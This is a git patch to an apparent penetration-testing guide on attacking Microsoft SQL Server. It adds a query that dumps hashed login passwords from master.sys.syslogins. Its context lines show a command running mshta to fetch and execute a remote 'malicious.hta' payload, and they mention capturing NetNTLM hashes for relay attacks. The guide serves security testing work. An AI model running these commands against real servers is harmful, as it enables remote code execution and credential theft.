From ca3d61e9ce85cae4efd12b3470428be391405d69 Mon Sep 17 00:00:00 2001
From: Carlos Polop
Date: Wed, 19 Feb 2025 20:20:13 +0100
Subject: [PATCH] a

---
 .../pentesting-mssql-microsoft-sql-server/README.md | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
index da7fdda89..668d98efd 100644
--- a/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
+++ b/src/network-services-pentesting/pentesting-mssql-microsoft-sql-server/README.md
@@ -252,6 +252,12 @@ mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec ho
 mssqlpwner corp.com/user:lab@192.168.1.65 -windows-auth -link-name SRV01 exec "cmd /c mshta http://192.168.45.250/malicious.hta" -command-execution-method sp_oacreate
 ```
 
+### Get hashed passwords
+
+```bash
+SELECT * FROM master.sys.syslogins;
+```
+
 ### Steal NetNTLM hash / Relay attack
 
 You should start a **SMB server** to capture the hash used in the authentication (`impacket-smbserver` or `responder` for example).